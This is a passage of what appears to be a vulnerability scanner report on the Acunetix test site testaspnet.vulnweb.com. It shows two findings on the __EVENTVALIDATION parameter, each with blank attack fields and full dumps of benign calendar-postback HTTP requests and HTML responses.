<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8489&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAlLSxMNsIZGRkmwxBsk8x1a%2FkkLdBPjguHzrSU%2B4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKClMCwBALTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdg9g9%2FsugOp%2FTTDyPMqpq%2FdI1LoQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:13 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgAAlLSxMNsIZGRkmwxBsk8x1a/kkLdBPjguHzrSU+4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKClMCwBALTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdg9g9/sugOp/TTDyPMqpq/dI1LoQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:White" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8153&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAyAmqKNoIZGRksLSpSN%2FzqXl2iHFFGZ1xSafuxZ8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKcmpW1CAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPbQT%2BLmvFrqlKtXgATdI4%2BPxUqfM%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:23 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgAAyAmqKNoIZGRksLSpSN/zqXl2iHFFGZ1xSafuxZ8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKcmpW1CAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPbQT+LmvFrqlKtXgATdI4+PxUqfM=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:White" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 